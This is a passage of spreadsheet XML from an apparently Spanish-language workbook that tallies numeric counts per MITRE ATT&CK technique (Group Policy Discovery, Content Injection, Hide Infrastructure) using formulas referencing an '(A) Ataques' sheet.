        <f>IF('(A) Ataques'!$AP108&lt;&gt;"NO",'(A) Ataques'!LO108,"")</f>
        <v>4</v>
      </c>
      <c r="BH108" s="471">
        <f>IF('(A) Ataques'!$AP108&lt;&gt;"NO",'(A) Ataques'!LS108,"")</f>
        <v>119</v>
      </c>
      <c r="BI108" s="331">
        <f>IF('(A) Ataques'!$AK108&lt;&gt;"NO",IF($BD108=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ108" s="469">
        <f>'(A) Ataques'!OL108+'(A) Ataques'!OR108+'(A) Ataques'!OX108+'(A) Ataques'!PD108+'(A) Ataques'!PJ108</f>
        <v>40</v>
      </c>
      <c r="BK108" s="510">
        <f>'(A) Ataques'!ON108+'(A) Ataques'!OT108+'(A) Ataques'!OZ108+'(A) Ataques'!PF108+'(A) Ataques'!PL108</f>
        <v>40</v>
      </c>
      <c r="BL108" s="471">
        <f>'(A) Ataques'!OP108+'(A) Ataques'!OV108+'(A) Ataques'!PB108+'(A) Ataques'!PH108+'(A) Ataques'!PN108</f>
        <v>6</v>
      </c>
      <c r="BM108" s="495">
        <f>'(A) Ataques'!OH108</f>
        <v>17</v>
      </c>
      <c r="BN108" s="331">
        <f>IF('(A) Ataques'!$AK108&lt;&gt;"NO",IF($BJ108=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BO108" s="469">
        <f>IF('(A) Ataques'!$AP108&lt;&gt;"NO",'(A) Ataques'!OC108,"")</f>
        <v>40</v>
      </c>
      <c r="BP108" s="510">
        <f>IF('(A) Ataques'!$AP108&lt;&gt;"NO",'(A) Ataques'!OD108,"")</f>
        <v>40</v>
      </c>
      <c r="BQ108" s="471">
        <f>IF('(A) Ataques'!$AP108&lt;&gt;"NO",'(A) Ataques'!OE108,"")</f>
        <v>6</v>
      </c>
      <c r="BR108" s="471">
        <f>IF('(A) Ataques'!$AP108&lt;&gt;"NO",'(A) Ataques'!OF108,"")</f>
        <v>2</v>
      </c>
      <c r="BS108" s="471">
        <f>IF('(A) Ataques'!$AP108&lt;&gt;"NO",'(A) Ataques'!OJ108,"")</f>
        <v>17</v>
      </c>
      <c r="BT108" s="331">
        <f>IF('(A) Ataques'!$AK108&lt;&gt;"NO",IF($BO108=0,0,1),"")</f>
        <v>1</v>
      </c>
    </row>
    <row r="109" spans="1:72" s="1" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A109" s="79">
        <f t="shared" si="1"/>
        <v>107</v>
      </c>
      <c r="B109" s="4">
        <f>IF('(A) Ataques'!AK109&lt;&gt;"NO",'(A) Ataques'!E109,"")</f>
        <v>73</v>
      </c>
      <c r="C109" s="6" t="str">
        <f>IF('(A) Ataques'!AK109&lt;&gt;"NO",IF('(A) Ataques'!M109="","",'(A) Ataques'!M109),"")</f>
        <v>T1615-Group_Policy_Discovery</v>
      </c>
      <c r="D109" s="4" t="str">
        <f>IF('(A) Ataques'!AK109&lt;&gt;"NO",'(A) Ataques'!F109,"")</f>
        <v>T1615</v>
      </c>
      <c r="E109" s="286">
        <f>IF('(A) Ataques'!AK109&lt;&gt;"NO",'(A) Ataques'!AQ109,"")</f>
        <v>53</v>
      </c>
      <c r="F109" s="288">
        <f>IF('(A) Ataques'!$AK109&lt;&gt;"NO",'(A) Ataques'!BB109,"")</f>
        <v>39</v>
      </c>
      <c r="G109" s="392">
        <f>IF('(A) Ataques'!$AK109&lt;&gt;"NO",'(A) Ataques'!BD109,"")</f>
        <v>39</v>
      </c>
      <c r="H109" s="4">
        <f>IF('(A) Ataques'!$AK109&lt;&gt;"NO",'(A) Ataques'!BF109,"")</f>
        <v>1</v>
      </c>
      <c r="I109" s="20">
        <f>IF('(A) Ataques'!$AK109&lt;&gt;"NO",'(A) Ataques'!BG109,"")</f>
        <v>39</v>
      </c>
      <c r="J109" s="530">
        <f>IF('(A) Ataques'!$AK109&lt;&gt;"NO",IF($F109=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="K109" s="322">
        <f>IF('(A) Ataques'!$AK109&lt;&gt;"NO",'(A) Ataques'!$BH109,"")</f>
        <v>0</v>
      </c>
      <c r="L109" s="322">
        <f>IF('(A) Ataques'!$AK109&lt;&gt;"NO",'(A) Ataques'!$BJ109,"")</f>
        <v>0</v>
      </c>
      <c r="M109" s="4">
        <f>IF('(A) Ataques'!$AK109&lt;&gt;"NO",'(A) Ataques'!$BL109,"")</f>
        <v>0</v>
      </c>
      <c r="N109" s="20">
        <f>IF('(A) Ataques'!$AK109&lt;&gt;"NO",'(A) Ataques'!$BM109,"")</f>
        <v>0</v>
      </c>
      <c r="O109" s="532">
        <f>IF('(A) Ataques'!$AK109&lt;&gt;"NO",IF($K109=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="P109" s="292">
        <f>IF('(A) Ataques'!$AK109&lt;&gt;"NO",'(A) Ataques'!$BN109,"")</f>
        <v>39</v>
      </c>
      <c r="Q109" s="322">
        <f>IF('(A) Ataques'!$AK109&lt;&gt;"NO",'(A) Ataques'!$BP109,"")</f>
        <v>39</v>
      </c>
      <c r="R109" s="4">
        <f>IF('(A) Ataques'!$AK109&lt;&gt;"NO",'(A) Ataques'!$BR109,"")</f>
        <v>1</v>
      </c>
      <c r="S109" s="20">
        <f>IF('(A) Ataques'!$AK109&lt;&gt;"NO",'(A) Ataques'!$BS109,"")</f>
        <v>39</v>
      </c>
      <c r="T109" s="530">
        <f>IF('(A) Ataques'!$AK109&lt;&gt;"NO",IF($P109=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="U109" s="322">
        <f>IF('(A) Ataques'!$AK109&lt;&gt;"NO",'(A) Ataques'!$BT109,"")</f>
        <v>39</v>
      </c>
      <c r="V109" s="322">
        <f>IF('(A) Ataques'!$AK109&lt;&gt;"NO",'(A) Ataques'!$BV109,"")</f>
        <v>39</v>
      </c>
      <c r="W109" s="4">
        <f>IF('(A) Ataques'!$AK109&lt;&gt;"NO",'(A) Ataques'!$BX109,"")</f>
        <v>1</v>
      </c>
      <c r="X109" s="20">
        <f>IF('(A) Ataques'!$AK109&lt;&gt;"NO",'(A) Ataques'!$BY109,"")</f>
        <v>39</v>
      </c>
      <c r="Y109" s="532">
        <f>IF('(A) Ataques'!$AK109&lt;&gt;"NO",IF($U109=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z109" s="288">
        <f>IF('(A) Ataques'!$AK109&lt;&gt;"NO",'(A) Ataques'!BZ109,"")</f>
        <v>10</v>
      </c>
      <c r="AA109" s="392">
        <f>IF('(A) Ataques'!$AK109&lt;&gt;"NO",'(A) Ataques'!CB109,"")</f>
        <v>10</v>
      </c>
      <c r="AB109" s="4">
        <f>IF('(A) Ataques'!$AK109&lt;&gt;"NO",'(A) Ataques'!CD109,"")</f>
        <v>2</v>
      </c>
      <c r="AC109" s="20">
        <f>IF('(A) Ataques'!$AK109&lt;&gt;"NO",'(A) Ataques'!CE109,"")</f>
        <v>5</v>
      </c>
      <c r="AD109" s="331">
        <f>IF('(A) Ataques'!$AK109&lt;&gt;"NO",IF(Z109=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE109" s="322">
        <f>IF('(A) Ataques'!$AK109&lt;&gt;"NO",'(A) Ataques'!$CF109,"")</f>
        <v>49</v>
      </c>
      <c r="AF109" s="322">
        <f>IF('(A) Ataques'!$AK109&lt;&gt;"NO",'(A) Ataques'!$CH109,"")</f>
        <v>49</v>
      </c>
      <c r="AG109" s="4">
        <f>IF('(A) Ataques'!$AK109&lt;&gt;"NO",'(A) Ataques'!$CJ109,"")</f>
        <v>3</v>
      </c>
      <c r="AH109" s="20">
        <f>IF('(A) Ataques'!$AK109&lt;&gt;"NO",'(A) Ataques'!$CK109,"")</f>
        <v>43</v>
      </c>
      <c r="AI109" s="287">
        <f>IF('(A) Ataques'!$AK109&lt;&gt;"NO",IF($AE109=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ109" s="292">
        <f>IF('(A) Ataques'!$AK109&lt;&gt;"NO",'(A) Ataques'!$CL109,"")</f>
        <v>0</v>
      </c>
      <c r="AK109" s="322">
        <f>IF('(A) Ataques'!$AK109&lt;&gt;"NO",'(A) Ataques'!$CN109,"")</f>
        <v>0</v>
      </c>
      <c r="AL109" s="4">
        <f>IF('(A) Ataques'!$AK109&lt;&gt;"NO",'(A) Ataques'!$CP109,"")</f>
        <v>0</v>
      </c>
      <c r="AM109" s="20">
        <f>IF('(A) Ataques'!$AK109&lt;&gt;"NO",'(A) Ataques'!$CQ109,"")</f>
        <v>0</v>
      </c>
      <c r="AN109" s="331">
        <f>IF('(A) Ataques'!$AK109&lt;&gt;"NO",IF($AJ109=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO109" s="322">
        <f>IF('(A) Ataques'!$AK109&lt;&gt;"NO",'(A) Ataques'!$CR109,"")</f>
        <v>0</v>
      </c>
      <c r="AP109" s="322">
        <f>IF('(A) Ataques'!$AK109&lt;&gt;"NO",'(A) Ataques'!$CT109,"")</f>
        <v>0</v>
      </c>
      <c r="AQ109" s="4">
        <f>IF('(A) Ataques'!$AK109&lt;&gt;"NO",'(A) Ataques'!$CV109,"")</f>
        <v>0</v>
      </c>
      <c r="AR109" s="20">
        <f>IF('(A) Ataques'!$AK109&lt;&gt;"NO",'(A) Ataques'!$CW109,"")</f>
        <v>0</v>
      </c>
      <c r="AS109" s="287">
        <f>IF('(A) Ataques'!$AK109&lt;&gt;"NO",IF($AO109=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AT109" s="288">
        <f>IF('(A) Ataques'!$AK109&lt;&gt;"NO",'(A) Ataques'!CX109,"")</f>
        <v>39</v>
      </c>
      <c r="AU109" s="392">
        <f>IF('(A) Ataques'!$AK109&lt;&gt;"NO",'(A) Ataques'!CZ109,"")</f>
        <v>39</v>
      </c>
      <c r="AV109" s="4">
        <f>IF('(A) Ataques'!$AK109&lt;&gt;"NO",'(A) Ataques'!DB109,"")</f>
        <v>1</v>
      </c>
      <c r="AW109" s="20">
        <f>IF('(A) Ataques'!$AK109&lt;&gt;"NO",'(A) Ataques'!DC109,"")</f>
        <v>39</v>
      </c>
      <c r="AX109" s="331">
        <f>IF('(A) Ataques'!$AK109&lt;&gt;"NO",IF($AT109=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AY109" s="469">
        <f>'(A) Ataques'!LU109+'(A) Ataques'!MA109+'(A) Ataques'!MG109+'(A) Ataques'!MM109+'(A) Ataques'!MS109</f>
        <v>0</v>
      </c>
      <c r="AZ109" s="510">
        <f>'(A) Ataques'!LW109+'(A) Ataques'!MC109+'(A) Ataques'!MI109+'(A) Ataques'!MO109+'(A) Ataques'!MU109</f>
        <v>0</v>
      </c>
      <c r="BA109" s="471">
        <f>'(A) Ataques'!LY109+'(A) Ataques'!ME109+'(A) Ataques'!MK109+'(A) Ataques'!MQ109+'(A) Ataques'!MW109</f>
        <v>0</v>
      </c>
      <c r="BB109" s="471">
        <f>'(A) Ataques'!LQ109</f>
        <v>0</v>
      </c>
      <c r="BC109" s="331">
        <f>IF('(A) Ataques'!$AK109&lt;&gt;"NO",IF($AY109=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="BD109" s="469">
        <f>IF('(A) Ataques'!$AP109&lt;&gt;"NO",'(A) Ataques'!LL109,"")</f>
        <v>49</v>
      </c>
      <c r="BE109" s="510">
        <f>IF('(A) Ataques'!$AP109&lt;&gt;"NO",'(A) Ataques'!LM109,"")</f>
        <v>49</v>
      </c>
      <c r="BF109" s="471">
        <f>IF('(A) Ataques'!$AP109&lt;&gt;"NO",'(A) Ataques'!LN109,"")</f>
        <v>0</v>
      </c>
      <c r="BG109" s="471">
        <f>IF('(A) Ataques'!$AP109&lt;&gt;"NO",'(A) Ataques'!LO109,"")</f>
        <v>6</v>
      </c>
      <c r="BH109" s="471">
        <f>IF('(A) Ataques'!$AP109&lt;&gt;"NO",'(A) Ataques'!LS109,"")</f>
        <v>49</v>
      </c>
      <c r="BI109" s="331">
        <f>IF('(A) Ataques'!$AK109&lt;&gt;"NO",IF($BD109=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ109" s="469">
        <f>'(A) Ataques'!OL109+'(A) Ataques'!OR109+'(A) Ataques'!OX109+'(A) Ataques'!PD109+'(A) Ataques'!PJ109</f>
        <v>0</v>
      </c>
      <c r="BK109" s="510">
        <f>'(A) Ataques'!ON109+'(A) Ataques'!OT109+'(A) Ataques'!OZ109+'(A) Ataques'!PF109+'(A) Ataques'!PL109</f>
        <v>0</v>
      </c>
      <c r="BL109" s="471">
        <f>'(A) Ataques'!OP109+'(A) Ataques'!OV109+'(A) Ataques'!PB109+'(A) Ataques'!PH109+'(A) Ataques'!PN109</f>
        <v>0</v>
      </c>
      <c r="BM109" s="495">
        <f>'(A) Ataques'!OH109</f>
        <v>0</v>
      </c>
      <c r="BN109" s="331">
        <f>IF('(A) Ataques'!$AK109&lt;&gt;"NO",IF($BJ109=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="BO109" s="469">
        <f>IF('(A) Ataques'!$AP109&lt;&gt;"NO",'(A) Ataques'!OC109,"")</f>
        <v>0</v>
      </c>
      <c r="BP109" s="510">
        <f>IF('(A) Ataques'!$AP109&lt;&gt;"NO",'(A) Ataques'!OD109,"")</f>
        <v>0</v>
      </c>
      <c r="BQ109" s="471">
        <f>IF('(A) Ataques'!$AP109&lt;&gt;"NO",'(A) Ataques'!OE109,"")</f>
        <v>0</v>
      </c>
      <c r="BR109" s="471">
        <f>IF('(A) Ataques'!$AP109&lt;&gt;"NO",'(A) Ataques'!OF109,"")</f>
        <v>0</v>
      </c>
      <c r="BS109" s="471">
        <f>IF('(A) Ataques'!$AP109&lt;&gt;"NO",'(A) Ataques'!OJ109,"")</f>
        <v>0</v>
      </c>
      <c r="BT109" s="331">
        <f>IF('(A) Ataques'!$AK109&lt;&gt;"NO",IF($BO109=0,0,1),"")</f>
        <v>0</v>
      </c>
    </row>
    <row r="110" spans="1:72" s="1" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A110" s="79">
        <f t="shared" si="1"/>
        <v>108</v>
      </c>
      <c r="B110" s="4">
        <f>IF('(A) Ataques'!AK110&lt;&gt;"NO",'(A) Ataques'!E110,"")</f>
        <v>74</v>
      </c>
      <c r="C110" s="6" t="str">
        <f>IF('(A) Ataques'!AK110&lt;&gt;"NO",IF('(A) Ataques'!M110="","",'(A) Ataques'!M110),"")</f>
        <v>T1659-Content_Injection</v>
      </c>
      <c r="D110" s="4" t="str">
        <f>IF('(A) Ataques'!AK110&lt;&gt;"NO",'(A) Ataques'!F110,"")</f>
        <v>T1659</v>
      </c>
      <c r="E110" s="286">
        <f>IF('(A) Ataques'!AK110&lt;&gt;"NO",'(A) Ataques'!AQ110,"")</f>
        <v>89</v>
      </c>
      <c r="F110" s="288">
        <f>IF('(A) Ataques'!$AK110&lt;&gt;"NO",'(A) Ataques'!BB110,"")</f>
        <v>2</v>
      </c>
      <c r="G110" s="392">
        <f>IF('(A) Ataques'!$AK110&lt;&gt;"NO",'(A) Ataques'!BD110,"")</f>
        <v>2</v>
      </c>
      <c r="H110" s="4">
        <f>IF('(A) Ataques'!$AK110&lt;&gt;"NO",'(A) Ataques'!BF110,"")</f>
        <v>2</v>
      </c>
      <c r="I110" s="20">
        <f>IF('(A) Ataques'!$AK110&lt;&gt;"NO",'(A) Ataques'!BG110,"")</f>
        <v>2</v>
      </c>
      <c r="J110" s="530">
        <f>IF('(A) Ataques'!$AK110&lt;&gt;"NO",IF($F110=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="K110" s="322">
        <f>IF('(A) Ataques'!$AK110&lt;&gt;"NO",'(A) Ataques'!$BH110,"")</f>
        <v>3</v>
      </c>
      <c r="L110" s="322">
        <f>IF('(A) Ataques'!$AK110&lt;&gt;"NO",'(A) Ataques'!$BJ110,"")</f>
        <v>3</v>
      </c>
      <c r="M110" s="4">
        <f>IF('(A) Ataques'!$AK110&lt;&gt;"NO",'(A) Ataques'!$BL110,"")</f>
        <v>3</v>
      </c>
      <c r="N110" s="20">
        <f>IF('(A) Ataques'!$AK110&lt;&gt;"NO",'(A) Ataques'!$BM110,"")</f>
        <v>2</v>
      </c>
      <c r="O110" s="532">
        <f>IF('(A) Ataques'!$AK110&lt;&gt;"NO",IF($K110=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="P110" s="292">
        <f>IF('(A) Ataques'!$AK110&lt;&gt;"NO",'(A) Ataques'!$BN110,"")</f>
        <v>5</v>
      </c>
      <c r="Q110" s="322">
        <f>IF('(A) Ataques'!$AK110&lt;&gt;"NO",'(A) Ataques'!$BP110,"")</f>
        <v>5</v>
      </c>
      <c r="R110" s="4">
        <f>IF('(A) Ataques'!$AK110&lt;&gt;"NO",'(A) Ataques'!$BR110,"")</f>
        <v>5</v>
      </c>
      <c r="S110" s="20">
        <f>IF('(A) Ataques'!$AK110&lt;&gt;"NO",'(A) Ataques'!$BS110,"")</f>
        <v>3</v>
      </c>
      <c r="T110" s="530">
        <f>IF('(A) Ataques'!$AK110&lt;&gt;"NO",IF($P110=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="U110" s="322">
        <f>IF('(A) Ataques'!$AK110&lt;&gt;"NO",'(A) Ataques'!$BT110,"")</f>
        <v>17</v>
      </c>
      <c r="V110" s="322">
        <f>IF('(A) Ataques'!$AK110&lt;&gt;"NO",'(A) Ataques'!$BV110,"")</f>
        <v>13</v>
      </c>
      <c r="W110" s="4">
        <f>IF('(A) Ataques'!$AK110&lt;&gt;"NO",'(A) Ataques'!$BX110,"")</f>
        <v>10</v>
      </c>
      <c r="X110" s="20">
        <f>IF('(A) Ataques'!$AK110&lt;&gt;"NO",'(A) Ataques'!$BY110,"")</f>
        <v>9</v>
      </c>
      <c r="Y110" s="532">
        <f>IF('(A) Ataques'!$AK110&lt;&gt;"NO",IF($U110=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z110" s="288">
        <f>IF('(A) Ataques'!$AK110&lt;&gt;"NO",'(A) Ataques'!BZ110,"")</f>
        <v>62</v>
      </c>
      <c r="AA110" s="392">
        <f>IF('(A) Ataques'!$AK110&lt;&gt;"NO",'(A) Ataques'!CB110,"")</f>
        <v>25</v>
      </c>
      <c r="AB110" s="4">
        <f>IF('(A) Ataques'!$AK110&lt;&gt;"NO",'(A) Ataques'!CD110,"")</f>
        <v>11</v>
      </c>
      <c r="AC110" s="20">
        <f>IF('(A) Ataques'!$AK110&lt;&gt;"NO",'(A) Ataques'!CE110,"")</f>
        <v>18</v>
      </c>
      <c r="AD110" s="331">
        <f>IF('(A) Ataques'!$AK110&lt;&gt;"NO",IF(Z110=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE110" s="322">
        <f>IF('(A) Ataques'!$AK110&lt;&gt;"NO",'(A) Ataques'!$CF110,"")</f>
        <v>79</v>
      </c>
      <c r="AF110" s="322">
        <f>IF('(A) Ataques'!$AK110&lt;&gt;"NO",'(A) Ataques'!$CH110,"")</f>
        <v>38</v>
      </c>
      <c r="AG110" s="4">
        <f>IF('(A) Ataques'!$AK110&lt;&gt;"NO",'(A) Ataques'!$CJ110,"")</f>
        <v>21</v>
      </c>
      <c r="AH110" s="20">
        <f>IF('(A) Ataques'!$AK110&lt;&gt;"NO",'(A) Ataques'!$CK110,"")</f>
        <v>24</v>
      </c>
      <c r="AI110" s="287">
        <f>IF('(A) Ataques'!$AK110&lt;&gt;"NO",IF($AE110=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ110" s="292">
        <f>IF('(A) Ataques'!$AK110&lt;&gt;"NO",'(A) Ataques'!$CL110,"")</f>
        <v>0</v>
      </c>
      <c r="AK110" s="322">
        <f>IF('(A) Ataques'!$AK110&lt;&gt;"NO",'(A) Ataques'!$CN110,"")</f>
        <v>0</v>
      </c>
      <c r="AL110" s="4">
        <f>IF('(A) Ataques'!$AK110&lt;&gt;"NO",'(A) Ataques'!$CP110,"")</f>
        <v>0</v>
      </c>
      <c r="AM110" s="20">
        <f>IF('(A) Ataques'!$AK110&lt;&gt;"NO",'(A) Ataques'!$CQ110,"")</f>
        <v>0</v>
      </c>
      <c r="AN110" s="331">
        <f>IF('(A) Ataques'!$AK110&lt;&gt;"NO",IF($AJ110=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO110" s="322">
        <f>IF('(A) Ataques'!$AK110&lt;&gt;"NO",'(A) Ataques'!$CR110,"")</f>
        <v>5</v>
      </c>
      <c r="AP110" s="322">
        <f>IF('(A) Ataques'!$AK110&lt;&gt;"NO",'(A) Ataques'!$CT110,"")</f>
        <v>2</v>
      </c>
      <c r="AQ110" s="4">
        <f>IF('(A) Ataques'!$AK110&lt;&gt;"NO",'(A) Ataques'!$CV110,"")</f>
        <v>2</v>
      </c>
      <c r="AR110" s="20">
        <f>IF('(A) Ataques'!$AK110&lt;&gt;"NO",'(A) Ataques'!$CW110,"")</f>
        <v>2</v>
      </c>
      <c r="AS110" s="287">
        <f>IF('(A) Ataques'!$AK110&lt;&gt;"NO",IF($AO110=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AT110" s="288">
        <f>IF('(A) Ataques'!$AK110&lt;&gt;"NO",'(A) Ataques'!CX110,"")</f>
        <v>10</v>
      </c>
      <c r="AU110" s="392">
        <f>IF('(A) Ataques'!$AK110&lt;&gt;"NO",'(A) Ataques'!CZ110,"")</f>
        <v>7</v>
      </c>
      <c r="AV110" s="4">
        <f>IF('(A) Ataques'!$AK110&lt;&gt;"NO",'(A) Ataques'!DB110,"")</f>
        <v>7</v>
      </c>
      <c r="AW110" s="20">
        <f>IF('(A) Ataques'!$AK110&lt;&gt;"NO",'(A) Ataques'!DC110,"")</f>
        <v>4</v>
      </c>
      <c r="AX110" s="331">
        <f>IF('(A) Ataques'!$AK110&lt;&gt;"NO",IF($AT110=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AY110" s="469">
        <f>'(A) Ataques'!LU110+'(A) Ataques'!MA110+'(A) Ataques'!MG110+'(A) Ataques'!MM110+'(A) Ataques'!MS110</f>
        <v>5</v>
      </c>
      <c r="AZ110" s="510">
        <f>'(A) Ataques'!LW110+'(A) Ataques'!MC110+'(A) Ataques'!MI110+'(A) Ataques'!MO110+'(A) Ataques'!MU110</f>
        <v>4</v>
      </c>
      <c r="BA110" s="471">
        <f>'(A) Ataques'!LY110+'(A) Ataques'!ME110+'(A) Ataques'!MK110+'(A) Ataques'!MQ110+'(A) Ataques'!MW110</f>
        <v>2</v>
      </c>
      <c r="BB110" s="471">
        <f>'(A) Ataques'!LQ110</f>
        <v>4</v>
      </c>
      <c r="BC110" s="331">
        <f>IF('(A) Ataques'!$AK110&lt;&gt;"NO",IF($AY110=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BD110" s="469">
        <f>IF('(A) Ataques'!$AP110&lt;&gt;"NO",'(A) Ataques'!LL110,"")</f>
        <v>96</v>
      </c>
      <c r="BE110" s="510">
        <f>IF('(A) Ataques'!$AP110&lt;&gt;"NO",'(A) Ataques'!LM110,"")</f>
        <v>89</v>
      </c>
      <c r="BF110" s="471">
        <f>IF('(A) Ataques'!$AP110&lt;&gt;"NO",'(A) Ataques'!LN110,"")</f>
        <v>2</v>
      </c>
      <c r="BG110" s="471">
        <f>IF('(A) Ataques'!$AP110&lt;&gt;"NO",'(A) Ataques'!LO110,"")</f>
        <v>11</v>
      </c>
      <c r="BH110" s="471">
        <f>IF('(A) Ataques'!$AP110&lt;&gt;"NO",'(A) Ataques'!LS110,"")</f>
        <v>87</v>
      </c>
      <c r="BI110" s="331">
        <f>IF('(A) Ataques'!$AK110&lt;&gt;"NO",IF($BD110=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ110" s="469">
        <f>'(A) Ataques'!OL110+'(A) Ataques'!OR110+'(A) Ataques'!OX110+'(A) Ataques'!PD110+'(A) Ataques'!PJ110</f>
        <v>3</v>
      </c>
      <c r="BK110" s="510">
        <f>'(A) Ataques'!ON110+'(A) Ataques'!OT110+'(A) Ataques'!OZ110+'(A) Ataques'!PF110+'(A) Ataques'!PL110</f>
        <v>3</v>
      </c>
      <c r="BL110" s="471">
        <f>'(A) Ataques'!OP110+'(A) Ataques'!OV110+'(A) Ataques'!PB110+'(A) Ataques'!PH110+'(A) Ataques'!PN110</f>
        <v>1</v>
      </c>
      <c r="BM110" s="495">
        <f>'(A) Ataques'!OH110</f>
        <v>3</v>
      </c>
      <c r="BN110" s="331">
        <f>IF('(A) Ataques'!$AK110&lt;&gt;"NO",IF($BJ110=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BO110" s="469">
        <f>IF('(A) Ataques'!$AP110&lt;&gt;"NO",'(A) Ataques'!OC110,"")</f>
        <v>3</v>
      </c>
      <c r="BP110" s="510">
        <f>IF('(A) Ataques'!$AP110&lt;&gt;"NO",'(A) Ataques'!OD110,"")</f>
        <v>3</v>
      </c>
      <c r="BQ110" s="471">
        <f>IF('(A) Ataques'!$AP110&lt;&gt;"NO",'(A) Ataques'!OE110,"")</f>
        <v>1</v>
      </c>
      <c r="BR110" s="471">
        <f>IF('(A) Ataques'!$AP110&lt;&gt;"NO",'(A) Ataques'!OF110,"")</f>
        <v>1</v>
      </c>
      <c r="BS110" s="471">
        <f>IF('(A) Ataques'!$AP110&lt;&gt;"NO",'(A) Ataques'!OJ110,"")</f>
        <v>3</v>
      </c>
      <c r="BT110" s="331">
        <f>IF('(A) Ataques'!$AK110&lt;&gt;"NO",IF($BO110=0,0,1),"")</f>
        <v>1</v>
      </c>
    </row>
    <row r="111" spans="1:72" s="1" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A111" s="79">
        <f t="shared" si="1"/>
        <v>109</v>
      </c>
      <c r="B111" s="4">
        <f>IF('(A) Ataques'!AK111&lt;&gt;"NO",'(A) Ataques'!E111,"")</f>
        <v>75</v>
      </c>
      <c r="C111" s="6" t="str">
        <f>IF('(A) Ataques'!AK111&lt;&gt;"NO",IF('(A) Ataques'!M111="","",'(A) Ataques'!M111),"")</f>
        <v>T1665-Hide_Infrastructure</v>
      </c>
      <c r="D111" s="4" t="str">
        <f>IF('(A) Ataques'!AK111&lt;&gt;"NO",'(A) Ataques'!F111,"")</f>
        <v>T1665</v>
      </c>
      <c r="E111" s="286">
        <f>IF('(A) Ataques'!AK111&lt;&gt;"NO",'(A) Ataques'!AQ111,"")</f>
        <v>12</v>
      </c>
      <c r="F111" s="288">
        <f>IF('(A) Ataques'!$AK111&lt;&gt;"NO",'(A) Ataques'!BB111,"")</f>
        <v>18</v>
      </c>
      <c r="G111" s="392">
        <f>IF('(A) Ataques'!$AK111&lt;&gt;"NO",'(A) Ataques'!BD111,"")</f>
        <v>4</v>
      </c>
      <c r="H111" s="4">
        <f>IF('(A) Ataques'!$AK111&lt;&gt;"NO",'(A) Ataques'!BF111,"")</f>
        <v>2</v>
      </c>
      <c r="I111" s="20">
        <f>IF('(A) Ataques'!$AK111&lt;&gt;"NO",'(A) Ataques'!BG111,"")</f>
        <v>4</v>
      </c>
      <c r="J111" s="530">
        <f>IF('(A) Ataques'!$AK111&lt;&gt;"NO",IF($F111=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="K111" s="322">
        <f>IF('(A) Ataques'!$AK111&lt;&gt;"NO",'(A) Ataques'!$BH111,"")</f>
        <v>0</v>
      </c>
      <c r="L111" s="322">
        <f>IF('(A) Ataques'!$AK111&lt;&gt;"NO",'(A) Ataques'!$BJ111,"")</f>
        <v>0</v>
      </c>
      <c r="M111" s="4">
        <f>IF('(A) Ataques'!$AK111&lt;&gt;"NO",'(A) Ataques'!$BL111,"")</f>
        <v>0</v>
      </c>
      <c r="N111" s="20">
        <f>IF('(A) Ataques'!$AK111&lt;&gt;"NO",'(A) Ataques'!$BM111,"")</f>
        <v>0</v>
      </c>
      <c r="O111" s="532">
        <f>IF('(A) Ataques'!$AK111&lt;&gt;"NO",IF($K111=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="P111" s="292">
        <f>IF('(A) Ataques'!$AK111&lt;&gt;"NO",'(A) Ataques'!$BN111,"")</f>
        <v>18</v>
      </c>
      <c r="Q111" s="322">
        <f>IF('(A) Ataques'!$AK111&lt;&gt;"NO",'(A) Ataques'!$BP111,"")</f>
        <v>4</v>
      </c>
      <c r="R111" s="4">
        <f>IF('(A) Ataques'!$AK111&lt;&gt;"NO",'(A) Ataques'!$BR111,"")</f>
        <v>2</v>
      </c>
      <c r="S111" s="20">
        <f>IF('(A) Ataques'!$AK111&lt;&gt;"NO",'(A) Ataques'!$BS111,"")</f>
        <v>4</v>
      </c>
      <c r="T111" s="530">
        <f>IF('(A) Ataques'!$AK111&lt;&gt;"NO",IF($P111=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="U111" s="322">
        <f>IF('(A) Ataques'!$AK111&lt;&gt;"NO",'(A) Ataques'!$BT111,"")</f>
        <v>286</v>
      </c>
      <c r="V111" s="322">
        <f>IF('(A) Ataques'!$AK111&lt;&gt;"NO",'(A) Ataques'!$BV111,"")</f>
        <v>11</v>
      </c>
      <c r="W111" s="4">
        <f>IF('(A) Ataques'!$AK111&lt;&gt;"NO",'(A) Ataques'!$BX111,"")</f>
        <v>4</v>
      </c>
      <c r="X111" s="20">
        <f>IF('(A) Ataques'!$AK111&lt;&gt;"NO",'(A) Ataques'!$BY111,"")</f>
        <v>9</v>
      </c>
      <c r="Y111" s="532">
        <f>IF('(A) Ataques'!$AK111&lt;&gt;"NO",IF($U111=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z111" s="288">
